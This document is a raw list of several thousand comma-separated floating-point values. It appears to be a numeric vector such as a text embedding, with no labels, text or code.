0.001719731604680419, 0.009192605502903461, 0.03198778256773949, 0.004565246868878603, -0.02055913768708706, -0.019705096259713173, 0.00009887000487651676, -0.005621154326945543, -0.0020438795909285545, 0.007624272722750902, -0.009052853100001812, -0.00017881520034279674, -0.01406064908951521, 0.006086995825171471, -0.005881248973309994, -0.015248545445501804, 0.0022127472329884768, 0.0030027367174625397, -0.005232953000813723, 0.007635918445885181, -0.005784198641777039, 0.00517084077000618, 0.004371146205812693, -0.00433620810508728, -0.002707703737542033, -0.039844974875450134, 0.007542750332504511, 0.0019972955342382193, 0.007934833876788616, -0.007775671314448118, -0.009798199869692326, 0.005306710954755545, 0.0073952339589595795, -0.015473701991140842, -0.012717473320662975, -0.0005148519412614405, 0.002560187363997102, 0.011040443554520607, 0.0037092629354447126, -0.02041938528418541, -0.03236045688390732, -0.022624369710683823, 0.01411499734967947, 0.002942565595731139, 0.010807522572577, -0.000912272953428328, 0.014246986247599125, -0.034534383565187454, 0.020885227248072624, 0.007647564634680748, 0.005807490553706884, -0.012795113027095795, 0.004289623815566301, -0.0073874699883162975, -0.012484552338719368, 0.005062144249677658, 0.00344722718000412, 0.012973685748875141, 0.0020555255468934774, -0.011242308653891087, -0.02453431859612465, -0.008268686942756176, -0.020233049988746643, -0.0025368952192366123, -0.01815229095518589, -0.003200719365850091, 0.012554428540170193, 0.025093328207731247, 0.008734527975320816, -0.0034278170205652714, -0.00040615556645207107, 0.017593281343579292, 0.00483698770403862, 0.002853279234841466, -0.023261019960045815, -0.0055512781254947186, 0.021708214655518532, -0.005182486958801746, -0.005691030528396368, 0.010489197447896004, -0.0018808350432664156, -0.011234544217586517, -0.014883636496961117, -0.029363542795181274, -0.007406880147755146, 0.022298280149698257, 0.010108760558068752, -0.006017119623720646, -0.0031696632504463196, -0.008175518363714218, -0.0011141375871375203, -0.008874280378222466, 0.0052096606232225895, -0.0037849622312933207, -0.020372802391648293, -0.01464295107871294, 0.03198778256773949, 0.016257869079709053, -0.01976720802485943, 0.02201877534389496, -0.0049301558174192905, -0.015031152404844761, -0.02358710765838623, -0.007965889759361744, -0.021413180977106094, 0.03959652781486511, -0.004860279615968466, -0.000504176365211606, 0.001484869746491313, -0.013517167419195175, 0.0044992524199187756, -0.00483698770403862, 0.0010636714287102222, 0.01774856075644493, -0.030683426186442375, 0.008882044814527035, 0.007092436775565147, -0.01697215810418129, -0.014146053232252598, -0.01437121070921421, -0.004852515645325184, 0.0043944381177425385, 0.003806313266977668, 0.01892869360744953, -0.001381025998853147, 0.013431763276457787, 0.005582334008067846, 0.025621281936764717, -0.01829204335808754, 0.008967448957264423, 0.0026378275360912085, -0.0024786649737507105, 0.034006427973508835, -0.018509436398744583, -0.004984504077583551, 0.008680179715156555, 0.009635155089199543, -0.004530308768153191, 0.0031948962714523077, -0.0013286188477650285, -0.009937952272593975, 0.014969040639698505, -0.02333865873515606, -0.02159951813519001, -0.008385146968066692, 0.006176281720399857, 0.007996945641934872, -0.010970567353069782, 0.00047845803783275187, 0.008649123832583427, -0.0026455915067344904, -0.021428709849715233, -0.0019021861953660846, -0.0041071693412959576, 0.014091705903410912, 0.01787278614938259, 0.019534287974238396, 0.019658511504530907, -0.0003949947713408619, -0.006583893205970526, -0.011506285518407822, 0.012841697782278061, -0.01292710192501545, -0.010504726320505142, -0.01053578220307827, 0.005163076799362898, 0.012329271994531155, 0.017593281343579292, -0.00286880717612803, 0.00536494143307209, 0.004934038035571575, -0.0010112642776221037, -0.00927800964564085, 0.0040838769637048244, 0.009114965796470642, 0.012996978126466274, 0.0032667135819792747, 0.027375953271985054, 0.002164222067221999, -0.009658447466790676, -0.0067741116508841515, -0.010636714287102222, -0.0018458969425410032, -0.0014838993083685637, 0.009580806829035282, 0.001803194871172309, -0.017313776537775993, 0.011514049023389816, -0.009316829964518547, -0.004899099934846163, -0.011459700763225555, 0.006777993869036436, 0.015877431258559227, -0.012212811037898064, -0.00626556808128953, -0.014798231422901154, -0.005066026467829943, 0.023944253101944923, -0.005846310872584581, -0.013369651511311531, 0.0023583227302879095, -0.039410192519426346, 0.007441818248480558, -0.003381232963874936, 0.010093232616782188, 0.00593171501532197, 0.007938715629279613, -0.01014758087694645, 0.0033948200289160013, -0.020248576998710632, 0.010357209481298923, 0.0032317754812538624, 0.016630541533231735, -0.015108793042600155, 0.010209692642092705, 0.0072748917154967785, 0.0012325389543548226, -0.012104115448892117, 0.025792092084884644, -0.0017634042305871844, 0.007868839427828789, 0.0073564136400818825, 0.02414611726999283, 0.0001023274235194549, -0.0038296054117381573, 0.007146785035729408, 0.012461259961128235, 0.025481529533863068, 0.01776408962905407, -0.02346288412809372, -0.02040385827422142, -0.005656092427670956, 0.005112610291689634, -0.004429376218467951, 0.011164668016135693, 0.015978364273905754, 0.02240697667002678, 0.010877398774027824, 0.014604130759835243, 0.005217425059527159, -0.000023898639483377337, 0.004782639443874359, -0.015287365764379501, -0.02742253616452217, -0.01431686244904995, -0.010504726320505142, 0.010434850119054317, -0.004662297200411558, 0.001824545906856656, 0.0014674006961286068, -0.01498456858098507, -0.011498521082103252, 0.0014101410051807761, -0.006824578158557415, -0.0012160404585301876, 0.004941802006214857, -0.00861030351370573, 0.01762433722615242, -0.013020270504057407, -0.0053610592149198055, 0.015768734738230705, -0.005912305321544409, -0.0016935279127210379, 0.011506285518407822, 0.008066821843385696, -0.02517096884548664, 0.006603303365409374, -0.011715914122760296, 0.03020205721259117, 0.004992268048226833, 0.016770293936133385, -0.025139912962913513, -0.0005454227793961763, -0.0021486938931047916, -0.02159951813519001, -0.011622745543718338, 0.002100168727338314, 0.013074617832899094, 0.02704986371099949, 0.012383620254695415, -0.004068349022418261, -0.008323035202920437, 0.010706590488553047, -0.016413148492574692, 0.015318421646952629, 0.000055985899962252006, 0.003895599627867341, 0.002593184355646372, -0.005298946984112263, 0.0016178287332877517, 0.005423171445727348, -0.007612626533955336, -0.003649091813713312, 0.009448818862438202, 0.0036995578557252884, -0.010023356415331364, -0.0037733162753283978, 0.0022826234344393015, 0.005749260541051626, 0.00007066476246109232, 0.005788080859929323, 0.022826233878731728, -0.01286498922854662, -0.004052821081131697, 0.020326217636466026, 0.0025621282402426004, 0.01760880835354328, -0.021444236859679222, 0.018090179190039635, -0.028261050581932068, 0.007837783545255661, -0.0008191046654246747, -0.00022709772747475654, 0.01173144206404686, 0.0007962977979332209, -0.013136730529367924, 0.003136666025966406, 0.017142968252301216, -0.02625793218612671, -0.000801150337792933, -0.010217457078397274, -0.003290005726739764, -0.016211284324526787, 0.02281070500612259, 0.01709638349711895, 0.002154516987502575, 0.0035326313227415085, 0.009541986510157585, 0.00841620285063982, 0.0037539061158895493, -0.0055590420961380005, -0.01748458482325077, -0.031351134181022644, -0.002410729881376028, 0.002096286742016673, 0.007600980345159769, -0.023121267557144165, 0.00009298633085563779, -0.01670818217098713, -0.006090877577662468, 0.009130493737757206, -0.005427053663879633, -0.0032065424602478743, -0.03829217329621315, 0.005062144249677658, 0.010931747034192085, 0.0063354442827403545, 0.013796672224998474, -0.004429376218467951, -0.013687976635992527, -0.010885163210332394, -0.007177841383963823, -0.001522719394415617, 0.01669265329837799, -0.009161549620330334, -0.009635155089199543, 0.013237662613391876, 0.003722850000485778, 0.004654533229768276, 0.02132001332938671, 0.021692685782909393, 0.0028008720837533474, 0.01178579032421112, -0.01588519476354122, -0.010380501858890057, 0.00768250273540616, 0.012430204078555107, 0.003660737769678235, 0.014821523800492287, 0.002661119680851698, 0.0042740958742797375, -0.015295129269361496, -0.015396061353385448, -0.005861838813871145, -0.002523308154195547, -0.0021739269141107798, 0.006552837323397398, 0.007500048261135817, 0.023229962214827538, -0.008043530397117138, 0.02624240517616272, -0.003041556803509593, -0.009184841997921467, 0.0052484809421002865, -0.02874242141842842, 0.007550514303147793, 0.028664780780673027, 0.01550475787371397, -0.0015537755098193884, 0.0032026602420955896, -0.005000032018870115, -0.016754766926169395, -0.008920865133404732, 0.009790435433387756, 0.030698955059051514, 0.004860279615968466, -0.026972223073244095, 0.002622299361974001, -0.0013897605240345001, 0.015621218830347061, 0.030652370303869247, 0.027500176802277565, 0.013183314353227615, 0.0071234931237995625, -0.005104846321046352, -0.004565246868878603, -0.008540427312254906, -0.008392911404371262, 0.006467432714998722, 0.013548223301768303, 0.0037927262019366026, 0.0026999397668987513, 0.017810674384236336, 0.0007249658228829503, -0.006855634041130543, 0.0042740958742797375, -0.018602604046463966, -0.0060637034475803375, 0.02888217382133007, -0.003711204044520855, -0.0015440704300999641, 0.009014032781124115, -0.013338594697415829, -0.007698030676692724, -0.018788941204547882, -0.0017634042305871844, -0.0027931081131100655, 0.005073790438473225, -0.010993859730660915, -0.002397142816334963, -0.005885131191462278, -0.012368092313408852, 0.005461991764605045, 0.005803608801215887, -0.009712795726954937, -0.016925575211644173, 0.018897637724876404, 0.010310625657439232, 0.00795036181807518, 0.019922487437725067, -0.019580870866775513, -0.002595125464722514, -0.0028396921698004007, -0.00914602167904377, 0.0008792758453637362, 0.007872721180319786, 0.004483724478632212, -0.0001233752118423581, 0.003454991150647402, -0.00809011422097683, 0.015528050251305103, 0.008835460990667343, -0.0061102877371013165, 0.016863461583852768, -0.0016236517112702131, -0.012608776800334454, -0.008020238019526005, -0.01684793457388878, -0.03350953385233879, -0.024689599871635437, -0.011956598609685898, -0.0006269450532272458, -0.004588538780808449, -0.014549783430993557, 0.03658408671617508, 0.0034452860709279776, -0.0029056863859295845, -0.012624304741621017, 0.02506227232515812, 0.020714418962597847, -0.0036704428493976593, -0.03866484388709068, -0.01670818217098713, -0.00928577408194542, 0.01748458482325077, -0.044192831963300705, -0.007022560574114323, -0.008874280378222466, -0.008097877725958824, -0.020186465233564377, -0.00746122794225812, 0.012523372657597065, -0.02159951813519001, 0.02290387451648712, -0.019146086648106575, 0.04959659278392792, -0.0005551278009079397, -0.0036995578557252884, -0.018757885321974754, -0.007523340173065662, -0.004281859844923019, -0.012111878953874111, 0.007791199255734682, 0.017670921981334686, 0.015892960131168365, 0.013369651511311531, -0.019425591453909874, -0.0368325337767601, 0.014751647599041462, -0.008517135865986347, 0.01264759711921215, -0.007430172059684992, -0.0011616921983659267, -0.00888980831950903, 0.007399115711450577, -0.01225939579308033, 0.012042002752423286, -0.0024670190177857876, 0.004091641400009394, -0.027003278955817223, -0.007107965182512999, -0.011358768679201603, -0.010364973917603493, 0.008214338682591915, -0.007837783545255661, -0.01312120258808136, 0.01291933748871088, 0.006797404028475285, 0.005784198641777039, 0.010100997053086758, 0.010170873254537582, 0.006440258584916592, -0.023136794567108154, 0.011832374148070812, -0.0062539223581552505, -0.002280682325363159, -0.0071972510777413845, -0.002521367045119405, -0.012321507558226585, -0.017329303547739983, -0.006906100083142519, -0.009837020188570023, -0.006048175506293774, 0.0009700178634375334, -0.009549750946462154, -0.0185560192912817, -0.0007710647187195718, -0.0008181341690942645, -0.013462819159030914, -0.0022535081952810287, 0.0059511251747608185, -0.004301270004361868, -0.00026009485009126365, 0.023540524765849113, -0.006828459911048412, 0.0061025237664580345, 0.0073874699883162975, 0.0034491680562496185, -0.016009420156478882, 0.009541986510157585, 0.00503108836710453, -0.012616540305316448, -0.014875872060656548, -0.0055124578066170216, 0.004899099934846163, 0.016537373885512352, -0.0007841665064916015, 0.012802877463400364, -0.005966653116047382, 0.006739173550158739, 0.005508575588464737, 0.005819136742502451, 0.02836974710226059, -0.013555987738072872, 0.0007011885172687471, 0.005524103995412588, -0.010986095294356346, 0.009068381041288376, 0.021692685782909393, 0.012857225723564625, -0.009394470602273941, -0.006824578158557415, -0.0028591023292392492, -0.0063742646016180515, -0.012189519591629505, 0.010854107327759266, 0.007375823799520731, 0.004619595129042864, -0.00037728308234363794, 0.006781876087188721, 0.0046661789529025555, -0.008858752436935902, -0.008470551110804081, -0.02687905542552471, 0.00626556808128953, 0.011428644880652428, -0.0036044486332684755, -0.0037771982606500387, 0.020248576998710632, 0.008936393074691296, 0.010908455587923527, -0.00013004742504563183, 0.013524931855499744, 0.0007943568052724004, -0.007651446852833033, -0.0032356574665755033, -0.019456647336483, -0.011816846206784248, -0.026428740471601486, -0.004246921744197607, -0.011801318265497684, 0.015101028606295586, -0.00414210744202137, 0.007177841383963823, 0.01014758087694645, 0.0175156407058239, -0.023882141336798668, 0.00986807607114315, 0.025264138355851173, 0.019922487437725067, 0.021242372691631317, -0.009433290921151638, 0.0009375060326419771, 0.004281859844923019, 0.01854049228131771, -0.01537276990711689, -0.02993808127939701, 0.01604047603905201, 0.0024961340241134167, -0.012655360624194145, 0.010597893968224525, -0.013222134672105312, 0.01086187083274126, -0.0318325012922287, -0.026956694200634956, -0.015062208287417889, 0.003544277511537075, 0.026025012135505676, 0.000784651783760637, 0.009068381041288376, 0.01145193725824356, -0.007259363308548927, -0.019565343856811523, 0.009526458568871021, 0.0005264979554340243, -0.028276579454541206, 0.02409953437745571, 0.004441022407263517, -0.00947987474501133, -0.0023486176505684853, 0.006999268662184477, 0.01344729121774435, -0.003183250315487385, 0.0012412734795361757, 0.002987208543345332, -0.013222134672105312, -0.00947211030870676, 0.012577720917761326, 0.005889012943953276, -0.013408470898866653, 0.012181755155324936, 0.009969008155167103, 0.0016712064389139414, -0.021413180977106094, -0.00523683475330472, 0.012709708884358406, -0.012189519591629505, -0.002748464932665229, -0.008455023169517517, -0.030046777799725533, -0.012469024397432804, -0.003212365321815014, -0.0017430236330255866, -0.03767104819417, 0.043944381177425385, 0.00033797771902754903, 0.02330760285258293, -0.008641360327601433, -0.015279601328074932, -0.012088586576282978, -0.04441022500395775, -0.016894519329071045, -0.006975976750254631, 0.0054037612862885, 0.002245744224637747, -0.000013685610610991716, 0.001874041510745883, -0.009914659895002842, 0.013338594697415829, 0.012701945379376411, 0.009487638249993324, 0.017686448991298676, -0.011024915613234043, -0.022562256082892418, -0.003222070401534438, -0.0037422601599246264, 0.014169345609843731, -0.00024201921769417822, -0.010939511470496655, -0.02796601876616478, 0.0021972190588712692, -0.025233080610632896, -0.00035107950679957867, -0.011964363045990467, -0.00689445436000824, 0.007795081008225679, -0.01326095499098301, -0.00504273409023881, 0.003907245583832264, 0.016754766926169395, 0.008051293902099133, -0.014891400001943111, -0.001573185552842915, -0.01576097123324871, 0.021009452641010284, 0.01579202711582184, -0.010776466690003872, 0.004014000762254, -0.0005405702395364642, 0.0026339455507695675, 0.008967448957264423, 0.005578451789915562, -0.002942565595731139, 0.004914627876132727, 0.0016993510071188211, -0.010364973917603493, -0.016413148492574692, 0.008299742825329304, -0.013028034009039402, 0.015054444782435894, 0.002208865247666836, 0.00490298168733716, -0.011490756645798683, 0.007534986361861229, 0.00895192101597786, -0.007872721180319786, 0.007651446852833033, 0.012142934836447239, -0.011172432452440262, -0.005780316889286041, 0.004561364650726318, 0.01378890872001648, -0.0035093394108116627, -0.009262481704354286, 0.031087156385183334, 0.0073874699883162975, -0.029084037989377975, -0.013501639477908611, 0.0004474019515328109, -0.002263213275000453, 0.010955039411783218, 0.002802812959998846, -0.010815287008881569, 0.013765616342425346, 0.009231425821781158, -0.007523340173065662, 0.006195691879838705, -0.027764152735471725, -0.008905337192118168, 0.005555159877985716, -0.0005138813867233694, -0.028851117938756943, 0.0052484809421002865, 0.03245362639427185, 0.00038723074248991907, 0.013711268082261086, 0.008408439345657825, 0.011576161719858646, -0.011933306232094765, -0.0172361359000206, -0.009246953763067722, 0.010628950782120228, -0.005093200597912073, 0.01989143155515194, -0.02237592078745365, 0.008866516873240471, -0.0006900277221575379, -0.012243867851793766, -0.008687944151461124, -0.01591625064611435, -0.01159168966114521, -0.014666243456304073, -0.017158495262265205, -0.025108857080340385, 0.032143063843250275, 0.009899131953716278, 0.0019070386188104749, 0.004417730495333672, 0.012857225723564625, -0.01319884229451418, 0.012996978126466274, -0.012632069177925587, 0.011405352503061295, 0.00319683738052845, -0.011436409316956997, 0.024223757907748222, -0.011498521082103252, 0.012329271994531155, -0.009720559231936932, 0.013625863939523697, 0.012896046042442322, -0.003819900332018733, 0.004437140189111233, -0.01178579032421112, 0.007189487107098103, 0.005392115563154221, 0.00414210744202137, 0.010760938748717308, 0.007996945641934872, -0.008439495228230953, -0.011941070668399334, 0.019115028902888298, 0.013664684258401394, -0.017733033746480942, 0.0015460115391761065, -0.005648328457027674, -0.0007026442908681929, -0.014736119657754898, 0.004576892592012882, -0.005842428654432297, 0.01384325698018074, -0.008035765960812569, -0.005516340024769306, 0.009052853100001812, -0.01350940391421318, -0.009169314056634903, 0.01039602980017662, 0.017406944185495377, 0.0009113024570979178, -0.0001811201509553939, -0.023664748296141624, 0.01152957696467638, 0.002049702685326338, 0.0015625100350007415, 0.007142903283238411, -0.0028435741551220417, 0.012111878953874111, -0.011847902089357376, 0.027360424399375916, -0.019844848662614822, 0.01684793457388878, 0.008897572755813599, -0.014767175540328026, -0.0027135268319398165, -0.019285839051008224, 0.011506285518407822, 0.00007800418825354427, 0.005803608801215887, 0.018882108852267265, -0.0036083306185901165, -0.001046202378347516, 0.018214402720332146, 0.00980596337467432, -0.0008865545969456434, 0.002556305145844817, -0.010993859730660915, 0.013587043620646, -0.010978331789374352, -0.0017585516907274723, -0.0043944381177425385, -0.028043659403920174, 0.021677158772945404, 0.010660006664693356, 0.03403748571872711, 0.008307507261633873, 0.008897572755813599, -0.01086187083274126, 0.006347090471535921, -0.002476724097505212, -0.012026474811136723, 0.009184841997921467, -0.002435962902382016, 0.001719731604680419, 0.0013839374296367168, 0.01551252231001854, -0.026304516941308975, 0.012826169840991497, 0.02543494664132595, -0.016801349818706512, -0.007224425207823515, -0.013913133181631565, 0.00004233820072840899, -0.01378114428371191, 0.022965986281633377, -0.002071053721010685, 0.021630574017763138, -0.004332325886934996, -0.010916219092905521, 0.013470583595335484, -0.006665415596216917, -0.0011917778756469488, 0.026071596890687943, -0.019316894933581352, -0.017391415312886238, -0.016599485650658607, -0.026087123900651932, 0.009883604012429714, 0.018649188801646233, 0.006537308916449547, 0.006758583709597588, 0.007907659746706486, -0.0028474561404436827, -0.019441118463873863, 0.01339294295758009, 0.004786521662026644, -0.000606564455665648, 0.016754766926169395, -0.012601012364029884, -0.0018041653092950583, -0.01934795081615448, 0.0008254129206761718, -0.00966621097177267, 0.0006774112116545439, 0.007430172059684992, 0.0036199765745550394, -0.007003150414675474, 0.0062151020392775536, -0.014666243456304073, -0.0344722718000412, 0.016459733247756958, 0.007259363308548927, -0.009837020188570023, -0.007049734704196453, -0.007818372920155525, 0.007717440836131573, 0.008253159001469612, 0.02214299887418747, -0.009844783693552017, 0.013625863939523697, 0.012934865429997444, -0.00294644758105278, -0.006203455850481987, -0.019177142530679703, 0.011692621745169163, -0.014417794533073902, -0.010823050513863564, 0.01760880835354328, -0.01628892496228218, 0.00440220208838582, 0.0053998795337975025, 0.01000006403774023, 0.000446674064733088, -0.02652190998196602, -0.005920069292187691, -0.00011676365829771385, 0.017453528940677643, 0.008788876235485077, -0.006428612861782312, -0.006021001376211643, -0.01147522870451212, 0.01034168154001236, 0.01602494716644287, -0.006968212313950062, 0.001941006281413138, -0.0021195788867771626, 0.010108760558068752, -0.004763229284435511, -0.017422473058104515, 0.023649221286177635, 0.010116524994373322, 0.003703440073877573, -0.01936347782611847, 0.02559022605419159, -0.01681687869131565, -0.008773348294198513, 0.011319948360323906, -0.007503930013626814, -0.01602494716644287, -0.03099398873746395, 0.006847870070487261, 0.013734560459852219, 0.01602494716644287, 0.007224425207823515, 0.017686448991298676, -0.00483698770403862, 0.0038431924767792225, 0.01094727497547865, 0.0006211220170371234, 0.0013645273866131902, 0.02135106921195984, -0.010931747034192085, 0.009930187836289406, -0.009107201360166073, 0.004184809513390064, -0.000480156420962885, 0.0012568015372380614, 0.004965093918144703, 0.009829255752265453, -0.0007099230424501002, -0.011420880444347858, -0.000838999985717237, 0.009906896390020847, -0.011273364536464214, -0.02318337932229042, 0.002245744224637747, 0.0003287579456809908, -0.00526400888338685, 0.012996978126466274, -0.0027251727879047394, -0.037577882409095764, -0.03807478025555611, -0.02414611726999283, -0.0052096606232225895, 0.000558524567168206, -0.0062151020392775536, -0.0031735452357679605, 0.026475325226783752, 0.0016517962794750929, 0.01027956884354353, 0.0172361359000206, -0.011087027378380299, -0.010271805338561535, 0.005454227793961763, 0.0025252492632716894, 0.014720591716468334, 0.007391351740807295, 0.004103287123143673, 0.012305979616940022, 0.013385179452598095, -0.0028047540690749884, -0.00045783485984429717, -0.009332357905805111, -0.00395771162584424, -0.0034064659848809242, 0.011793553829193115, -0.0064946068450808525, -0.012911573983728886, 0.01072988286614418, 0.005873485002666712, 0.001350940321572125, 0.004619595129042864, 0.004161517601460218, 0.015380533412098885, 0.0040023550391197205, 0.002012823475524783, -0.0028183411341160536, 0.007496166042983532, 0.007930951192975044, -0.002175868023186922, -0.013431763276457787, 0.003454991150647402, -0.003443345194682479, -0.001484869746491313, 0.008128934539854527, -0.003355999942868948, 0.01372679602354765, -0.019301366060972214, -0.006048175506293774, -0.011646037921309471, 0.007139021065086126, -0.018773412331938744, 0.01642867736518383, -0.004798167385160923, 0.007496166042983532, -0.006409202702343464, -0.0034452860709279776, 0.0012121583567932248, 0.018866581842303276, 0.008066821843385696, -0.01697215810418129, 0.021164732053875923, 0.00557068781927228, 0.013416235335171223, 0.00164015032351017, 0.00008491902553942055, -0.008369619026780128, 0.005694912280887365, 0.022438032552599907, 0.005916187074035406, -0.005578451789915562, 0.0034918703604489565, 0.0013489993289113045, -0.006405320484191179, -0.0033909380435943604, 0.012267159298062325, -0.0032453625462949276, 0.0018226049141958356, 0.008400674909353256, 0.022888345643877983, 0.00656060129404068, 0.0057997265830636024, 0.004196455702185631, 0.0037014989648014307, -0.008967448957264423, -0.011428644880652428, 0.0035190442577004433, -0.021288957446813583, -0.016335507854819298, -0.02663060650229454, 0.0019390652887523174, -0.018074650317430496, -0.012632069177925587, 0.014580839313566685, -0.012546664103865623, 0.014472142793238163, -0.010248512960970402, -0.0031230791937559843, 0.027500176802277565, 0.005038852337747812, -0.0028183411341160536, 0.00006014086466166191, 0.01378890872001648, 0.01722060702741146, 0.0028396921698004007, 0.006614949554204941, -0.010163108818233013, 0.013245427049696445, 0.014860344119369984, -0.00048476632218807936, 0.018618132919073105, 0.0091382572427392, 0.028167882934212685, 0.005058262497186661, -0.0012296275235712528, 0.007352531887590885, -0.015217489562928677, 0.010380501858890057, -0.007014796603471041, 0.0018061063019558787, 0.022733066231012344, -0.01542711816728115, 0.023944253101944923, 0.002519426168873906, 0.013144494034349918, 0.013462819159030914, 0.010543545708060265, 0.005330003332346678, 0.011646037921309471, 0.002263213275000453, 0.023167850449681282, 0.029316958039999008, -0.015729915350675583, -0.01061342190951109, -0.00928577408194542, 0.01961192674934864, -0.0036296816542744637, -0.0010724059538915753, -0.013004741631448269, -0.018835524097085, -0.014937983825802803, -0.005345531273633242, 0.0027717568445950747, -0.002049702685326338, 0.017406944185495377, 0.002783403033390641, -0.015155376866459846, -0.017841730266809464, 0.015007860027253628, -0.003456932259723544, -0.01292710192501545, -0.013703504577279091, -0.01450319867581129, 0.02900639735162258, 0.02358710765838623, -0.024720655754208565, -0.009906896390020847, -0.008517135865986347, 0.03198778256773949, 0.020248576998710632, -0.006591657176613808, 0.004421612247824669, -0.006859516259282827, -0.007550514303147793, -0.022702008485794067, 0.005582334008067846, 0.003012441797181964, 0.020310688763856888, -0.011840138584375381, -0.0048253415152430534, 0.014875872060656548, 0.011793553829193115, 0.027872849255800247, 0.004072231240570545, 0.0006740144453942776, -0.017174024134874344, -0.010698826983571053, 0.014728355221450329, -0.00828421488404274, 0.013882076367735863, 0.0002125401806551963, 0.008967448957264423, -0.005489165894687176, 0.0030939639545977116, -0.0034025839995592833, 0.017531167715787888, 0.004246921744197607, -0.0014703122433274984, -0.009114965796470642, 0.003802431281656027, -0.002171986037865281, 0.002179750008508563, 0.015745442360639572, -0.014969040639698505, -0.030310753732919693, 0.012569956481456757, -0.008455023169517517, -0.013369651511311531, 0.007973654195666313, -0.006304388400167227, 0.0011141375871375203, -0.0031560761854052544, -0.014045121148228645, -0.016521845012903214, -0.0031308431643992662, 0.01586190238595009, -0.010962803848087788, 0.013587043620646, 0.004510898608714342, 0.0033987020142376423, -0.008936393074691296, 0.0036374458577483892, 0.0007749467622488737, -0.023928726091980934, -0.016910046339035034, 0.00014193607785273343, -0.0002427470899419859, 0.026677189394831657, 0.0059821815229952335, -0.025807619094848633, -0.0008001798414625227, 0.0027174088172614574, 0.010380501858890057, 0.01906844601035118, 0.005974417086690664, 0.007748497184365988, -0.008734527975320816, 0.0036956758704036474, 0.007701912894845009, 0.007340885698795319, -0.0002471143670845777, -0.0028008720837533474, -0.014805995859205723, 0.0031696632504463196, 0.010240749455988407, -0.015124320983886719, 0.025745507329702377, 0.0038587204180657864, 0.014534254558384418, -0.011941070668399334, -0.005205778870731592, -0.0020652306266129017, -0.014580839313566685, 0.01000006403774023, 0.002936742501333356, 0.0197361521422863, -0.05065250024199486, -0.02200324647128582, -0.003026028862223029, 0.01906844601035118, -0.032267287373542786, 0.005500811617821455, 0.011048207990825176, -0.012034239247441292, 0.015341713093221188, 0.024565374478697777, -0.008121170103549957, -0.007344767916947603, -0.000801150337792933, 0.005601744167506695, -0.0025485411752015352, 0.026801414787769318, 0.015108793042600155, 0.025419417768716812, -0.010784231126308441, -0.008315270766615868, 0.01630445197224617, 0.015784263610839844, -0.012096351012587547, -0.025683395564556122, 0.004188691731542349, -0.0210560355335474, 0.00875782035291195, -0.016615014523267746, 0.0064130849204957485, 0.01484481617808342, 0.014798231422901154, 0.0002829016593750566, 0.0008850988815538585, -0.013532695360481739, 0.012104115448892117, 0.002175868023186922, 0.004188691731542349, -0.008524899370968342, -0.012896046042442322, 0.0062151020392775536, -0.019239254295825958, 0.008633595891296864, 0.05329226702451706, 0.010970567353069782, -0.012958157807588577, 0.017406944185495377, -0.009076145477592945, 0.0019186846911907196, -0.01027956884354353, 0.003388996934518218, 0.018229931592941284, -0.03906857594847679, 0.01895974949002266, -0.004223629832267761, 0.016661597415804863, 0.009790435433387756, -0.006572247017174959, 0.00490298168733716, 0.0022865054197609425, -0.011568397283554077, -0.022577784955501556, -0.026195820420980453, -0.019549814984202385, 0.02490699291229248, 0.01762433722615242, 0.004945683758705854, 0.008128934539854527, 0.0026844115927815437, 0.0008768495754338801, 0.0053610592149198055, -0.012748529203236103, -0.01763986423611641, 0.016987686976790428, -0.002521367045119405, 0.0070380885154008865, 0.006090877577662468, -0.004441022407263517, 0.03208095207810402, 0.004215865395963192, 0.007853311486542225, -0.003175486344844103, -0.006385910790413618, -0.0031716041266918182, 0.0026417095214128494, -0.0006686766864731908, -0.01936347782611847, -0.00809011422097683, 0.022189583629369736, 0.002158398972824216, 0.0070769088342785835, 0.014355682767927647, 0.026056068018078804, 0.011809081770479679, -0.003059025853872299, 0.005613390356302261, 0.012344799935817719, 0.015069972723722458, 0.016242340207099915, 0.012088586576282978, 0.004211983643472195, -0.005271772854030132, 0.008167753927409649, -0.0027309958823025227, -0.009355650283396244, 0.0030978459399193525, -0.008291978389024734, -0.02611817978322506, 0.010636714287102222, -0.016910046339035034, 0.010015591979026794, 0.020497025921940804, -0.009448818862438202, -0.03614930063486099, 0.0034452860709279776, -0.017034271731972694, -0.017065327614545822, 0.0031483122147619724, -0.017127439379692078, -0.016537373885512352, -0.0218945499509573, -0.003237598342821002, 0.003664619754999876, -0.0021351068280637264, 0.028400802984833717, 0.014860344119369984, -0.014045121148228645, -0.005966653116047382, 0.0033870558254420757, 0.005702676251530647, -0.0029522704426199198, -0.0012771821347996593, 0.0015615395968779922, -0.001343176350928843, 0.01644420437514782, -0.007729087024927139, -0.00788824912160635, 0.005617272108793259, -0.0034278170205652714, 0.010799759067595005, 0.018385211005806923, -0.004351736046373844, 0.025419417768716812, 0.017655393108725548, -0.013672447763383389, -0.028664780780673027, -0.008703472092747688, -0.005318357143551111, -0.004588538780808449, -0.01642867736518383, -0.012632069177925587, -0.017733033746480942, 0.00629274221137166, 0.0031580172944813967, 0.003555923467501998, -0.008563719689846039, -0.007111846935003996, -0.009837020188570023, -0.0032492445316165686, -0.003027969738468528, 0.024177173152565956, 0.007430172059684992, -0.008548191748559475, -0.005446463357657194, 0.009573043324053288, 0.01897527649998665, 0.004767111502587795, 0.004689471330493689, -0.027220671996474266, -0.0024126707576215267, -0.005256244912743568, 0.003026028862223029, 0.0027038217522203922, 0.0032240115106105804, -0.0035966846626251936, 0.022733066231012344, -0.010683298110961914, -0.013408470898866653, 0.012608776800334454, -0.021630574017763138, 0.003092023078352213, 0.0030784360133111477, 0.0049689761362969875, 0.017795145511627197, 0.0569879449903965, 0.004534190520644188, -0.03323002904653549, -0.026056068018078804, 0.001158780767582357, -0.003233716357499361, -0.010364973917603493, 0.004526426550000906, -0.009782671928405762, 0.03153746947646141, 0.029984664171934128, -0.011964363045990467, 0.024705126881599426, -0.009549750946462154, 0.016615014523267746, 0.024689599871635437, -0.004316797945648432, 0.01034168154001236, -0.0019254782237112522, -0.011498521082103252, 0.008237631060183048, -0.005225189030170441, -0.007107965182512999, -0.012515608221292496, -0.00420810142531991, 0.012771821580827236, 0.005155312828719616, -0.00036854855716228485, -0.013563752174377441, 0.002443726873025298, -0.021785853430628777, -0.02015540935099125, -0.010621186345815659, -0.004654533229768276, 0.008323035202920437, 0.014720591716468334, -0.015753207728266716, 0.009091673418879509, 0.01619575545191765, -0.016273396089673042, 0.03310580179095268, -0.02941012755036354, 0.007337003480643034, 0.017857257276773453, 0.007313711568713188, -0.005333885084837675, -0.016273396089673042, 0.006545073352754116, 0.008998504839837551, 0.003835428273305297, 0.011607217602431774, 0.021382125094532967, -0.011832374148070812, 0.008773348294198513, -0.003878130577504635, 